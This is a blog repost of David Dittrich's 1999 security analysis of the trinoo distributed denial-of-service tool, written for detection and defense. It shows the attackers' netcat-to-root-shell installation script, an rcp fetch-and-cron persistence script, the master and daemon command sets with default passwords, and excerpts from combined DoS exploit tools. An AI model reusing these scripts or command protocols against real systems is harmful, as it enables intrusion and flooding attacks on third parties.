Archive for the hacking Category


Posted in hacking on 01/04/2009 by soloteam

  The DoS Project's "trinoo" distributed denial of service attack tool


David Dittrich <>
University of Washington
Copyright 1999. All rights reserved.
October 21, 1999


The following is an analysis of the DoS Project's "trinoo" (a.k.a.
"trin00") master/slave programs, which implement a distributed
network denial of service tool.

Trinoo daemons were originally found in binary form on a number of
Solaris 2.x systems, which were identified as having been compromised
by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd".  These attacks are described in CERT
Incident Note 99-04:

The trinoo daemons were originally believed to be UDP based,
access-restricted remote command shells, possibly used in conjunction
with sniffers to automate recovering sniffer logs.

During investigation of these intrusions, the installation of a trinoo
network was caught in the act and the trinoo source code was obtained
from the account used to cache the intruders' tools and log files.
This analysis was done using this recovered source code.

Modification of the source code would change any of the details
in this analysis, such as prompts, passwords, commands, TCP/UDP port
numbers, or supported attack methods, signatures, and features.

The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0
systems.  The master was compiled and run on Red Hat Linux 6.0.  It is
believed that both master and daemon have been witnessed "in the
wild" on these same platforms.

Trinoo networks are probably being set up on hundreds, perhaps
thousands, of systems on the Internet that are being compromised by
remote buffer overrun exploitation.  Access to these systems is
probably being perpetuated by the installation of multiple "back
doors" along with the trinoo daemons.

A trinoo network of at least 227 systems -- 114 of these at Internet2
sites -- was used on August 17, 1999 to flood a single system at the
University of Minnessota, swamping the target network and rendering it
unusable for over two days.  While responding to this attack, large
flows were also noticed going to at least sixteen other systems, some
outside the US.  (See Appendix D for a report of part of this trinoo

Attack scenario

A typical installation might go something like this.

1).  A stolen account is set up as a repository for pre-compiled
versions of scanning tools, attack (i.e. buffer overrun exploit)
tools, root kits and sniffers, trinoo daemon and master programs,
lists of vulnerable hosts and previously compromised hosts, etc.  This
would normally be a large system with many users, one with little
administrative oversight, and on a high-bandwidth connection for rapid
file transfer.

2).  A scan is performed of large ranges of network blocks to identify
potential targets.  Targets would include systems running various
services known to have remotely exploitable buffer overflow security
bugs, such as wu-ftpd, RPC services for "cmsd", "statd",
"ttdbserverd", "amd", etc.  Operating systems being targeted appear to
be primarily Sun Solaris 2.x and Linux (due to the ready availability
of network sniffers and "root kits" for concealing back doors, etc.),
but stolen accounts on any architecture can be used for caching tools
and log files.

3).  A list of vulnerable systems is then used to create a script that
performs the exploit, sets up a command shell running under the root
account that listens on a TCP port (commonly 1524/tcp, the
"ingreslock" service port), and connects to this port to confirm the
success of the exploit.  In some cases, an electronic mail message is
sent to an account at a free web based email service to confirm which
systems have been compromised.

The result is a list of "owned" systems ready for setting up
back doors, sniffers, or the trinoo daemons or masters.

4). From this list of compromised systems, subsets with the desired
architecture are chosen for the trinoo network.  Pre-compiled binaries
of the trinoo daemon are created and stored on a stolen account
somewhere on the Internet.

5). A script is then run which takes this list of "owned" systems and
produces yet another script to automate the installation process,
running each installation in the background for maximum multitasking.

This script uses "netcat" ("nc") to pipe a shell script to the root
shell listening on, in this case, port 1524/tcp:

./ | nc 1524 &
./ | nc 1524 &
./ | nc 1524 &
./ | nc 1524 &
./ | nc 128.bbb.2.80 1524 &
./ | nc 128.bbb.2.81 1524 &
./ | nc 128.bbb.2.238 1524 &
./ | nc 128.ccc.12.22 1524 &
./ | nc 128.ccc.12.50 1524 &
 . . .

The script "", whose output is being piped to these systems,
looks like:

echo "rcp /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"

Depending on how closely crontab files are monitored, or if they are
used at all, this may be detected easily.  If cron is not used at all
by this user (usually root), it may not be detected at all.

Another method was witnessed on at least one other system, where the
daemon was named "xterm", and was started using a script (named "c" on
the system on which it was found) that contains:

cd /var/adm/.1
export PATH
xterm 1>/dev/null 2>&1

This would supposedly imply a method of running this script on demand
to set up the trinoo network.

Even more subtle ways of having trinoo daemons/masters lie in wait for
execution at a given time are easy to envision (e.g., UDP or ICMP
based client/server shells, such as LOKI (see Appendix C) , programs
that wake up periodically and open a listening TCP or UDP port, etc.)

The result of this automation is the ability for attackers to set up
the denial of service network, on widely dispersed systems whose true
owners don't even know are out of their control, in a very short time

6).  Optionally, a "root kit" is installed on the system to hide the
presence of programs, files, and network connections.   This is more
important on the master system, since these systems are key to the
trinoo network. (It should be noted that in many cases, masters have
been set up on Internet Service Providers' primary name server hosts,
which would normally have extremely high packet traffic and large
numbers of TCP and UDP connections, which would effectively hide any
trinoo related traffic or activity, and would likely not be detected.
(The fact that these are primary name servers would also tend to make
the owners less likely to take the system off the Internet when
reports begin to come in about suspected denial of service related

Root kits would also be used on systems running sniffers that, along
with programs like "hunt" (TCP/IP session hijacking tool) are used to
burrow further into other networks directly, rather than through
remote buffer overrun exploits (e.g., to find sites to set up new file
repositories, etc.)

For more on "root kits" and some ways to get around them, see:

The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)

The trinoo network is made up of a master server ("master.c") and the
trinoo daemon ("ns.c").  A trinoo network would look like this:

                  +----------+           +----------+
                  | attacker |           | attacker |
                  +----------+           +----------+
                       |                      |
        . . . --+------+---------------+------+----------------+-- . . .
                |                      |                       |
                |                      |                       |
           +----------+           +----------+            +----------+
           |  master  |           |  master  |            |  master  |
           +----------+           +----------+            +----------+
                |                      |                       |
                |                      |                       |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
         |            |            |            |            |
         |            |            |            |            |
     +--------+   +--------+   +--------+   +--------+   +--------+
     | daemon |   | daemon |   | daemon |   | daemon |   | daemon |
     +--------+   +--------+   +--------+   +--------+   +--------+

The attacker(s) control one or more "master" servers, each of which
can control many "daemons" (known in the code as "Bcast", or
"broadcast" hosts.)  The daemons are all instructed to coordinate a
packet based attack against one or more victim systems.

All that is then needed is the ability to establish a TCP connection
to the master hosts using "telnet" and the password to the master
server to be able to wage massive, coordinated, denial of service

Communication ports

    Attacker to Master(s):	27665/tcp
    Master to daemon(s):	27444/udp
    Daemon to Master(s):	31335/udp

Remote control of the trinoo master is accomplished via a TCP
connection to port 27665/tcp.  After connecting, the user must give
the proper password ("betaalmostdone").  If another connection is made
to the server while someone is already authenticated, a warning is
sent to them with the IP address of the connecting host (it appears
there is a bug that reports incorrect IP addresses, but a warning is
still communicated).  This will no doubt be fixed eventually and will
then give the attackers time to clean up and cover their tracks.

Communication from the trinoo master to daemons is via UDP packets
on port 27444/udp.  Command lines are space separated lines of the

	arg1 password arg2

The default password for commands is "l44adsl", and only command lines
that contain the substring "l44" are processed.

Communication from the trinoo daemons and the master is via UDP
packets on port 31335/udp.

When the daemon starts, it initially sends "*HELLO*" to the master,
which maintains a list of active daemons that it controls (packet
captured using "sniffit"):

UDP Packet ID (from_IP.port-to_IP.port):
 45 E 00 . 00 . 23 # B1 . 5D ] 40 @ 00 . F8 . 11 . B9 . 27 . C0 . A8 . 00 . 01 .
 0A . 00 . 00 . 01 . 80 . 6C l 7A z 67 g 00 . 0F . 06 . D4 . 2A * 48 H 45 E 4C L
 4C L 4F O 2A *

If the trinoo master sends a "png" command to a daemon on port
27444/udp, the daemon will reply to the server that just sent the "png"
command by sending the string "PONG" on port 31335/udp:

UDP Packet ID (from_IP.port-to_IP.port):
 45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
 C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20  
 6C l 34 4 34 4 61 a 64 d 73 s 6C l

UDP Packet ID (from_IP.port-to_IP.port):
 45 E 00 . 00 . 20   13 . 81 . 40 @ 00 . F8 . 11 . 57 W 07 . C0 . A8 . 00 . 01 .
 0A . 00 . 00 . 01 . 80 . 6F o 7A z 67 g 00 . 0C . 4E N 24 $ 50 P 4F O 4E N 47 G

Password protection

Both the master and daemons are password protected to prevent
system administrators (or other hacker groups) from being able to take
control of the trinoo network.  These passwords are crypt() style
passwords.  They are used in a symmetric fashion, where the encrypted
password is compiled into the master and daemons and used to compare
against the clear-text version of the password that is sent over the
network (the current version does not encrypt the actual session, so the
clear-text passwords are exposed in transit and the master control
sessions are subject to TCP session highjacking).

When initially run, the master daemon produces a prompt, waiting
for a password.  If the proper password is not received, the program
exits.  If the proper password is given, the process announces its
execution, forks to continue running in the background, and exits:
  1. ./master
?? wrongpassword
  1. . . .
  2. ./master
?? gOrave trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24]
  1. Likewise, when you connect to the remote command port (default
27665/tcp), you must also give a password: attacker$ telnet 27665 Trying Connected to Escape character is '^]'. kwijibo Connection closed by foreign host. . . . attacker$ telnet 27665 Trying Connected to Escape character is '^]'. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo> Certain commands sent to the trinoo daemons by the master are also password protected. This password is sent in clear text between the master and daemons. The default passwords were: "l44adsl" trinoo daemon password "gOrave" trinoo master server startup ("?? " prompt) "betaalmostdone" trinoo master remote interface password "killme" trinoo master password to control "mdie" command Master commands --------------- The trinoo master supports the following commands: die Shut down the master. quit Log off the master. mtimer N Set DoS timer to N seconds. N can be between 1 and 1999 seconds. If N is < 1, it defaults to 300. If N is > 2000, it defaults to 500. dos IP DoS the IP address specified. A command ("aaa l44adsl IP") is sent to each Bcast host (i.e., trinoo daemons) telling them to DoS the specified IP address. mdie pass Disable all Bcast hosts, if the correct password is specified. A command is sent ("d1e l44adsl") to each Bcast host telling them to shut down. A separate password is required for this command. mping Send a PING command ("png l44adsl") to every active Bcast host. mdos <ip1:ip2:ip3> Multiple DoS. Sends a multiple DoS command ("xyz l44adsl 123:ip1:ip2:ip3") to each Bcast host. info Print version and compile information, e.g.: This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c Compiled 15:08:41 Aug 16 1999 msize Set the buffer size for packets sent during DoS attacks. nslookup host Do a name service lookup of the specified host from the perspective of the host on which the master server is running. killdead Attempts to weed out all dead Bcast hosts by first sending all known Bcast hosts a command ("shi l44adsl") that causes any active daemons to reply with the initial "*HELLO*" string, then renames the Bcast file (with extension "-b") so it will be re-initialized when the "*HELLO*" packets are received. usebackup Switch to the backup Bcast file created by the "killdead" command. bcast List all active Bcast hosts. help [cmd] Give a (partial) list of commands, or a brief description of the command "cmd" if specified. mstop Attempts to stop a DoS attack (not implemented, but listed in the help command). Daemon commands --------------- The trinoo daemon supports the following commands: aaa pass IP DoS the specified IP address. Sends UDP packets to random (0-65534) UDP ports on the specified IP addresses for a period of time (default is 120 seconds, or 1 - 1999 seconds as set by the "bbb" command.) The size of the packets is that set by the "rsz" command, or the default size of 1000 bytes. bbb pass N Sets time limit (in seconds) for DoS attacks. shi pass Sends the string "*HELLO*" to the list of master servers compiled into the program on port 31335/udp. png pass Sends the string "PONG" to the master that issued the the command on port 31335/udp. d1e pass Shut down the trinoo daemon. rsz N Set size of buffer for DoS attacks to N bytes. (The trinoo daemon simply malloc()s a buffer with this size, then sends the uninitialized contents of the buffer during an attack.) xyz pass 123:ip1:ip2:ip3 Multiple DoS. Does the same thing as the "aaa" command, but for multiple IP addresses. It could be coincidence, but I will give the author some credit and assume that three letter commands were chosen so they don't show up in the binary as visible strings under the default behavior of STRINGS(1). You must use the "--bytes=3" option of GNU STRINGS(1) to see the commands:
  1. strings --bytes=3 ns | tail -15
socket bind recvfrom l44 %s %s %s aIf3YWfOhw.V. aaa bbb shi png PONG d1e rsz xyz
  • HELLO*
Fingerprints ------------ The method used to install the trinoo daemon on some systems employs a crontab entry to start the daemon every minute. Examining crontab files would locate this entry:
  • * * * * /usr/sbin/rpc.listen
The master program creates a file (default name "...") containing the set of Bcast hosts. If the command "killdead" is used, an "shi" command is sent to all daemons listed in "...", which causes them to send the initial "*HELLO*" string to all masters. The current list is renamed (default "...-b") and a new list is then generated as each remaining live daemon sends its "*HELLO*". The source code ("master.c") contains the following lines: ------------------------------------------------------------------------------ . . . /* crypt key encrypted with the key 'bored'(so hex edit cannot get key easily?) comment out for no encryption... */
  1. define CRYPTKEY "ZsoTN.cq4X31"
. . . ------------------------------------------------------------------------------ If the program was compiled with CRYPTKEY defined, the IP addresses of Bcast hosts are encrypted using the Blowfish encryption algorithm:
  1. ls -l ... ...-b
-rw------- 1 root root 25 Sep 26 14:46 ... -rw------- 1 root root 50 Sep 26 14:30 ...-b
  1. cat ...
  1. cat ...-b
aE5sK0PIFws0Y0EhH02fLVK. JPbUc05Swk/0gMvui18BrFH/ Assuming there is no "root kit" present to hide processes, the master server shows the following network socket fingerprints (of course, the names and directory locations of either program are subject to change): ------------------------------------------------------------------------------
  1. netstat -a --inet
Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:27665 *:* LISTEN . . . udp 0 0 *:31335 *:* . . .
  1. lsof | egrep ":31335|:27665"
master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
  1. lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME master 1292 root cwd DIR 3,1 1024 14356 /tmp/... master 1292 root rtd DIR 3,1 1024 2 / master 1292 root txt REG 3,1 30492 14357 /tmp/.../master master 1292 root mem REG 3,1 342206 28976 /lib/ master 1292 root mem REG 3,1 63878 29116 /lib/ master 1292 root mem REG 3,1 4016683 29115 /lib/ master 1292 root 0u CHR 4,1 2967 /dev/tty1 master 1292 root 1u CHR 4,1 2967 /dev/tty1 master 1292 root 2u CHR 4,1 2967 /dev/tty1 master 1292 root 3u inet 2534 UDP *:31335 master 1292 root 4u inet 2535 TCP *:27665 (LISTEN) ------------------------------------------------------------------------------ A system running a daemon would show the following: ------------------------------------------------------------------------------
  1. netstat -a --inet
Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State . . . udp 0 0 *:1024 *:* udp 0 0 *:27444 *:* . . .
  1. lsof | egrep ":27444"
ns 1316 root 3u inet 2502 UDP *:27444
  1. lsof -p 1316
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME ns 1316 root cwd DIR 3,1 1024 153694 /tmp/... ns 1316 root rtd DIR 3,1 1024 2 / ns 1316 root txt REG 3,1 6156 153711 /tmp/.../ns ns 1316 root mem REG 3,1 342206 28976 /lib/ ns 1316 root mem REG 3,1 63878 29116 /lib/ ns 1316 root mem REG 3,1 4016683 29115 /lib/ ns 1316 root 0u CHR 4,1 2967 /dev/tty1 ns 1316 root 1u CHR 4,1 2967 /dev/tty1 ns 1316 root 2u CHR 4,1 2967 /dev/tty1 ns 1316 root 3u inet 2502 UDP *:27444 ns 1316 root 4u inet 2503 UDP *:1024 ------------------------------------------------------------------------------ Defenses -------- Of course, the best defense is to prevent intrusions and root level compromise of your systems in the first place, so there would be no systems on which to install trinoo master/daemons. In an ideal world, all systems would be patched, secured, monitored, intrusion detection systems and firewalls would be available to detect and reject packets, and I'd be a multi-millionaire living six months of the year in a beach mansion on Bali, and six months in the French Alps. In the real world, this is not an option (at least not in the foreseeable future.) Instead, your network may already have several trinoo daemons running and ready to DoS other systems at any minute. So how can they be detected or disabled? Because the programs use high numbered UDP ports for both communication and attack, it will be very difficult (if not impossible) to block it without breaking programs that use UDP on high numbered ports. The easiest method to detect the presence of trinoo masters or daemons (as the code exists presently) may be to monitor all UDP packets on shared Ethernet segments and look for the tell tale signs of communication between master(s) and daemon(s) as described elsewhere in this paper. (Switches would preclude seeing UDP packets that are not associated with the MAC address of the monitoring host's network interface.) Unfortunately, this would only occur during an attack, which would likely become known by network throughput degradation and/or reports of denial of service attacks from victim sites. If a system is suspected of hosting a trinoo daemon that is actively attacking, the output of the Solaris "truss" program on the running daemon will show output like the following: ------------------------------------------------------------------------------ . . . getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0 getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping...) getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0 time() = 938385467 open("/dev/udp", O_RDWR) = 5 ioctl(5, I_PUSH, "sockmod") = 0 ioctl(5, I_STR, 0xEFFFF748) = 0 ioctl(5, I_SETCLTIME, 0xEFFFF7FC) = 0 ioctl(5, I_SWROPT, 0x00000002) = 0 sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0 ioctl(5, I_STR, 0xEFFFF660) = 0 sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0 sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0) = 0 ioctl(5, I_STR, 0xEFFFF548) = 0 sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 . . . ------------------------------------------------------------------------------ The traffic on the network during an attack against a single target (as seen by "tcpdump") would look like: ------------------------------------------------------------------------------
  1. tcpdump ip host
. . . 15:40:08.491782 > udp 25 15:40:08.574453 > 216.160.XX.YY.16838: udp 4 (DF) 15:40:08.576427 > 216.160.XX.YY.5758: udp 4 (DF) 15:40:08.579752 > 216.160.XX.YY.10113: udp 4 (DF) 15:40:08.583056 > 216.160.XX.YY.17515: udp 4 (DF) 15:40:08.600948 > 216.160.XX.YY.31051: udp 4 (DF) 15:40:08.604943 > 216.160.XX.YY.5627: udp 4 (DF) 15:40:08.610886 > 216.160.XX.YY.23010: udp 4 (DF) 15:40:08.614202 > 216.160.XX.YY.7419: udp 4 (DF) 15:40:08.615507 > 216.160.XX.YY.16212: udp 4 (DF) 15:40:08.616854 > 216.160.XX.YY.4086: udp 4 (DF) 15:40:08.618827 > 216.160.XX.YY.2749: udp 4 (DF) 15:40:08.623480 > 216.160.XX.YY.12767: udp 4 (DF) 15:40:08.625458 > 216.160.XX.YY.9084: udp 4 (DF) 15:40:08.628764 > 216.160.XX.YY.12060: udp 4 (DF) 15:40:08.632090 > 216.160.XX.YY.32225: udp 4 (DF) . . . ------------------------------------------------------------------------------ Weaknesses ---------- The first weakness is that the crypt() encrypted passwords, and some prompts and return strings, are visible in both the master and daemon binary images. This can allow you to identify whether you have found a master or a daemon, determine whether the passwords are the defaults shown in this paper or not, and potentially allow you to exploit the password weaknesses to take control of some/all of the trinoo network yourself. If the source code has been modified (which it no doubt will by smarter attackers), you would need to crack the passwords, or use a hexadecimal/ASCII editor (e.g., "xxd", part of the VIM editor suite) and change them in the binary image, in order to, for example, run the master to retrieve the list of daemons. If the source has not, you can determine this fact by observing the strings embedded in the program binary: ------------------------------------------------------------------------------
  1. strings - ns
. . . socket bind recvfrom %s %s %s aIf3YWfOhw.V. <=== crypt() encrypted password "l44adsl" PONG
  • HELLO*
. . .
  1. strings - master
. . . ---v v1.07d2+f3+c trinoo %s l44adsl <=== clear text version of daemon password sock 0nm1VNMXqRMyM <=== crypt() encrypted password "gOrave" 10:09:24 Sep 26 1999 trinoo %s [%s:%s] bind read
  • HELLO*
ZsoTN.cq4X31 <=== CRYPTKEY bored NEW Bcast - %s PONG PONG %d Received from %s Warning: Connection from %s beUBZbLtK7kkY <=== crypt() encrypted password "betaalmostdone" trinoo %s..[rpm8d/cb4Sx/] . . . DoS: usage: dos <ip> DoS: Packeting %s. aaa %s %s mdie ErDVt6azHrePE <=== crypt() encrypted password for "mdie" command mdie: Disabling Bcasts. d1e %s mdie: password? . . . ------------------------------------------------------------------------------ Next, and more vulnerable, is the daemon password, which travels the network in clear text form. Assuming you know the UDP port on which the master communicates to the client, you can capture the password using "sniffit", "ngrep", "tcpdump", or any network monitoring program capable of showing UDP packet data payloads (see Appendix A for a sample session logged with "ngrep"). For example, here is the "png" command being sent to the trinoo daemon as seen by "sniffit": UDP Packet ID (from_IP.port-to_IP.port): 45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 . C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20 6C l 34 4 34 4 61 a 64 d 73 s 6C l As was mentioned earlier, the "mdie" command in the trinoo master is password protected in the master itself. There are a couple ways to attack this. If you can determine the crypt() encrypted string using the Unix "strings" command, you could (potentially) use a password cracking utility, such as "crack", and break it (see Appendix C). This may take a LONG time if the password was well chosen, but it is feasible (and the "killme" password for the "mdie" command was cracked in less than 30 seconds on a Pentium II). You could try to sniff the password on the wire between the attacker and the master, but presumably this command would not be used by the attackers often, if at all, since they want the daemons to be active when needed for an attack. You may have more luck sniffing the daemon password, since it is required for most commands. This can be done on either the daemon's or master's network (these are usually entirely different networks.) It should be easier to accomplish on the daemon's network since there are far more daemons than masters. Since many of the masters have been found on primary name servers, presumably there would be more traffic on high-numbered UDP ports on networks containing masters than on networks containing daemons (outside of the duration of denial of service attacks, that is.) Furthermore you will likely find several daemons at a given site, possibly as a result of detecting the original system compromise. Once you have located a daemon, you have also found the list of IP addresses of masters (use "strings" to see them.) You should immediately contact these sites and convince them to closely inspect the system for signs of intrusion, with likely "root kit" installations to make this task more difficult, and attempt to coordinate a response. Having found a master, the list of daemons (which will likely include hosts at many other sites) can be obtained by simply identifying the file which contains the list, if unencrypted. If, however, the file is encrypted, you would either have to decrypt the Blowfish encrypted file using the same key compiled into the program, or by taking control of the master and using the "bcast" command. It you have identified an active command session to a master, which is a standard "telnet" style TCP session, you could hijack the session using "hunt" and start executing commands. Not knowing the "mdie" command password, you could not disable all the daemons directly, but you COULD use the "bcast" command and get a list of all of them (you would probably want to do this using the "script" command to generate a transcript of the session, as this could be a very large list). Once you know the addresses of all the daemons, and the daemon password (visible in "strings" output), you could then send the proper command string in UDP packets to any suspected trinoo daemon(s). Creation and transmission of UDP packets can be accomplished with tools like LibNet, Spak, the Perl Net::RawIP library, etc. (A Perl script using Net::RawIP named "trinot" has been developed to accomplish this task. See Appendix B). As the typical installation of the daemon includes a crontab entry that runs it every minute, you would have to constantly spray your entire network to keep the daemons from re-starting. (This may be due to programming bugs that cause the daemons to crash occasionally, or may be to defeat system administrators who simply notice and kill the process, but do not think to check for a crontab entry that re-starts the daemon.) The daemons can also be found on your network by sniffing the data portion of UDP packets for the strings "*HELLO*" and "PONG", or any of the command strings themselves for that matter (until the source is modified to change these strings, of course.) The "ngrep" program works nicely for this: ------------------------------------------------------------------------------
  1. ngrep -i -x "*hello*|pong" udp
interface: eth0 ( filter: ip and ( udp ) match: *hello*|pong . . .
  1. U ->
2a 48 45 4c 4c 4f 2a *HELLO*
  1. ##
U -> 50 4f 4e 47 PONG U -> 50 4f 4e 47 PONG U -> 50 4f 4e 47 PONG . . . ------------------------------------------------------------------------------ While not weaknesses in trinoo itself, there are also weaknesses in the way the trinoo networks are set up. As mentioned earlier, some systems showed crontab entries used to start the daemons once per minute. This leaves an obvious fingerprint on crontab files. The scripts observed to automate the installation of trinoo networks use the Berkeley "rcp" command (use of rcp has also been observed in a file upload capability built into newer versions of the "Tribe Flood Network" daemon program). Monitoring "rcp" connections (514/tcp) from multiple systems on your network, in quick succession, to a single IP address outside your network would be a good trigger. (Note that the use of "rcp" in a script requires an anonymous trust relationship, usually in the form of "+ +" in a user's ~/.rhosts file, which also will allow you to immediately archive the contents of this account while contacting the owners to preserve evidence.) (Further analysis of trinoo by George Weaver of Pennsylvania State University and David Brumley of Stanford niversity is included in Appendix E - Further methods of detecting trinoo. George deserves special credit for attempting to hand-decompile a recovered SPARC binary image! ;) The next logical evolutionary steps ----------------------------------- One of the easiest attacks to implement is the denial of service attack. Many bugs exist in TCP/IP stacks, for example, that allow fragmented packets, large packets, IP options, half-open TCP connections, or floods of packets (highest bandwidth wins) etc., to cause the system performance to be degraded, or actually crash the system. As each bug is found, an exploit program demonstrating the bug is generally produced. Each of these exploit programs is generally unique, exploiting a specific bug that may only affect a single TCP/IP implementation (although with Microsoft having such a large market share of personal computers, and many home users being almost totally unaware of such bugs, let alone where to get and how to apply patches to fix these bugs, the chances are high that a multi-exploit attack will succeed in crashing the target system.) These denial of service exploits are available from numerous sites on the Internet, such as: The next step was to combine multiple denial of service exploits into one tool, using Unix shell scripts. One such tool, named "rape", (according to the code it was written in 1998 by "mars", with modifications by "TheVirus" and further code improvements by "ttol") integrates the following exploits into a single shell script: echo "Editted for use with" echo "rapeing $IP. using weapons:" echo "latierra " echo -n "teardrop v2 " echo -n "newtear " echo -n "boink " echo -n "bonk " echo -n "frag " echo -n "fucked " echo -n "troll icmp " echo -n "troll udp " echo -n "nestea2 " echo -n "fusion2 " echo -n "peace keeper " echo -n "arnudp " echo -n "nos " echo -n "nuclear " echo -n "ssping " echo -n "pingodeth " echo -n "smurf " echo -n "smurf4 " echo -n "land " echo -n "jolt " echo -n "pepsi " A tool like this has the advantage of allowing an attacker to give a single IP address and have multiple attacks be launched (increasing the probability of successful attack), but meant having to have pre-compiled versions of each individual exploit packaged up in a Unix "tar" format archive, etc., for convenient transfer to a (usually stolen) account from which to launch the attack. To still allow multiple denial of service exploits to be used, but with a single pre-compiled program that is more easy to store, transfer, and use quickly, programs like "targa.c" by Mixter were developed. Targa combines all of the following exploits in a single C source program: /* targa.c - copyright by Mixter <> version 1.0 - released 6/24/98 - interface to 8 multi-platform remote denial of service exploits
  • /
. . . /* bonk by route|daemon9 & klepto
  • jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
  • land by m3lt
  • nestea by humble & ttol
  • newtear by route|daemon9
  • syndrop by PineKoan
  • teardrop by route|daemon9
  • winnuke by _eci */
Even combined denial of service tools like "targa" still only allow one attacker to hit one IP address at a time. To increase the effectiveness of the attack, groups of attackers, using IRC channels or telephone "voice bridges" for communication, could coordinate attacks, each person hitting a different system. This same coordination is being seen in probing for vulnerabilities, and in system compromise and control using multiple back doors and "root kits." Even this has its limits, so in less than two years, it appears the next logical step has been taken to combine the power of a number of compromised systems into a distributed "denial of service cluster." The "trinoo" tool is an example of this, as is another similar tool available in the computer underground called the "Tribe Flood Network" (or "TFN") by Mixter. While trinoo only implements UDP flood attacks, TFN supports ICMP flood, UDP flood, SYN flood, and Smurf style attacks, and is controlled via commands sent as ICMP_ECHOREPLY (ICMP Type 0) packets. It also employs Blowfish encryption, similar to trinoo. (TFN is analyzed in a separate paper). It is all but guaranteed that these tools will continue to follow this trend and evolve into truly robust, covert, and distributed denial of service attack tools that employ strong encryption of embedded strings, passwords to control execution (possibly with trip wires that self-destruct, or wipe the entire system disc, if run in the wrong way, or by the wrong person), using encrypted communication channels, and communicating using packets posing as protocols like ICMP that are difficult to detect or block by firewalls. -- David Dittrich <> Appendix A: Example of network session captured with "ngrep" ------------------------------------------------------------ The following is an example of what an attack session would look like when viewed with "ngrep". ------------------------------------------------------------------------------
  1. ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444
interface: eth0 ( filter: ip and ( tcp port 27665 or udp port 31335 or udp port 27444 ) match: .*
  1. U ->
2a 48 45 4c 4c 4f 2a *HELLO*
  1. T -> [AP]
ff f4 ff fd 06 .....
  1. #####
T -> [AP] 62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a betaalmostdone..
  1. T -> [AP]
74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66 trinoo v1.07d2+f 33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53 3+c..[rpm8d/cb4S 78 2f 5d 0a 0a 0a x/]...
  1. #
T -> [AP] 74 72 69 6e 6f 6f 3e 20 trinoo>
  1. ##
T -> [AP] 62 63 61 73 74 0d 0a bcast..
  1. T -> [AP]
4c 69 73 74 69 6e 67 20 42 63 61 73 74 73 2e 0a Listing Bcasts.. 0a .
  1. ##
T -> [AP] 31 39 32 2e 31 36 38 2e 30 2e 31 2e 20 20 20 0a 0a 45 6e 64 2e 20 31 20 42 63 61 73 74 73 20 74 .End. 1 Bcasts t 6f 74 61 6c 2e 0a 74 72 69 6e 6f 6f 3e 20 otal..trinoo>
  1. #
T -> [AP] 6d 74 69 6d 65 72 20 31 30 30 30 0d 0a mtimer 1000..
  1. #
T -> [AP] 6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20 mtimer: Setting 74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74 timer on bcast t 6f 20 31 30 30 30 2e 0a o 1000..
  1. U ->
62 62 62 20 6c 34 34 61 64 73 6c 20 31 30 30 30 bbb l44adsl 1000
  1. #
T -> [AP] 6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20 mtimer: Setting 74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74 timer on bcast t 6f 20 31 30 30 30 2e 0a o 1000..
  1. ##
T -> [AP] 74 72 69 6e 6f 6f 3e 20 trinoo>
  1. ##
T -> [AP] 6d 73 69 7a 65 20 33 32 30 30 30 0d 0a msize 32000..
  1. U ->
